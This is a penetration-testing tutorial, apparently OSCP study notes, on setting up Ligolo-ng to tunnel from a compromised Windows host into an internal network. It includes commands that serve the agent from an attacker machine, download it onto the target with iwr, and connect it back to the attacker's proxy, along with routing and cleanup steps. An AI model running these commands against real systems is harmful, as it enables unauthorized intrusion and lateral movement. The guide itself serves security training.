Use Ligolo-ng to pivot into internal networks
Introduction
In the world of penetration testing, pivoting into internal networks is a crucial skill. Ligolo-ng is a versatile tool that facilitates this process by enabling attackers to tunnel through compromised systems and access internal network resources. This guide will walk you through how to use and setup Ligolo-ng to effectively pivot into internal networks.
Prerequisites
Download the agent for Windows (target machine is a Windows client):
Download the proxy file for Linux which will be run on the attacking machine:
┌──(kali㉿kali)-[~]
└─$ wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.5.1/ligolo-ng_proxy_0.5.1_linux_amd64.tar.gz
┌──(kali㉿kali)-[~]
└─$ wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.5.1/ligolo-ng_agent_0.5.1_windows_amd64.zip
┌──(kali㉿kali)-[~]
└─$ unzip ligolo-ng_agent_0.5.1_windows_amd64.zip
┌──(kali㉿kali)-[~]
└─$ tar -xf ligolo-ng_proxy_0.5.1_linux_amd64.tar.gz
Unzip the archives and host the files via python’s http.server module.
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.5.1/ligolo-ng_proxy_0.5.1_linux_amd64.tar.gz
wget https://github.com/nicocha30/ligolo-ng/releases/download/v0.5.1/ligolo-ng_agent_0.5.1_windows_amd64.zip
unzip ligolo-ng_agent_0.5.1_windows_amd64.zip
tar -xf ligolo-ng_proxy_0.5.1_linux_amd64.tar.gz
┌──(kali㉿kali)-[~]
└─$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
Transfer agent.exe to the target
Transfer agent.exe to the target Windows machine (dual-homed host):
PS C:\Users\Administrator\Desktop> iwr http://192.168.45.205:8000/agent.exe -o agent.exe
Set up a ligolo interface
On the attacking machine (e.g. Kali) create a tun interface called ligolo:
$ sudo ip tuntap add user kali mode tun ligolo
$ sudo ip link set ligolo up
Run the proxy with the selfsign option
On Kali, run the proxy:
./proxy -selfcert -laddr 0.0.0.0:443
Connect to the proxy via the compromised host
On target (Windows or Linux), run the agent or agent.exe:
.\agent -connect 192.168.45.236:443 -ignore-cert
Note: The IP used here points to our attacking machine (here: Kali VM).
We should get a notification on the proxy that the client has established a connection.
Select the session:
ligolo-ng » session
Show the interfaces:
ligolo-ng » ifconfig
ligolo-ng » start
[Agent : CASTLE\user@CLIENT01] » ifconfig
┌───────────────────────────────────────────────┐
│ Interface 0 │
├──────────────┬────────────────────────────────┤
│ Name │ Ethernet0 │
│ Hardware MAC │ 00:50:56:9e:e6:b8 │
│ MTU │ 1500 │
│ Flags │ up|broadcast|multicast|running │
│ IPv4 Address │ 172.16.75.243/24 │
└──────────────┴────────────────────────────────
Create the required routes to the internal network
On Linux:
sudo ip route add 172.16.75.0/24 dev ligolo
On Windows:
netsh int ipv4 show interfaces
route add 192.168.0.0 mask 255.255.255.0 0.0.0.0 if [THE INTERFACE IDX]
Establish the tunnel
Start the tunnel on the proxy:
[Agent : BEYOND\marcus@CLIENTWK1] » tunnel_start
Note: You can specify a custom tuntap via --tun iface
We can now access 172.16.75.0/24 agent network from the proxy server.
Check if it works by pinging the internal targets.
Clean Up
Check which routes exist on the machine:
$ ip route
172.16.235.0/24 dev ligolo scope link linkdown
Then, delete the existing route:
$ sudo ip route del 172.16.235.0/24 dev ligolo scope link
To delete the ligolo tun interface:
┌──(kali㉿kali)-[~/oscp/relia]
└─$ sudo ip link del ligolo
If you need more information check our the documentation.
Conclusion
Mastering the use of Ligolo-ng for pivoting into internal networks is an invaluable skill for the OSCP. By understanding how to set up and utilize this tool, you can navigate and exploit internal networks with greater precision and effectiveness. Incorporating Ligolo-ng into your arsenal will significantly enhance your ability to uncover and leverage hidden internal network resources.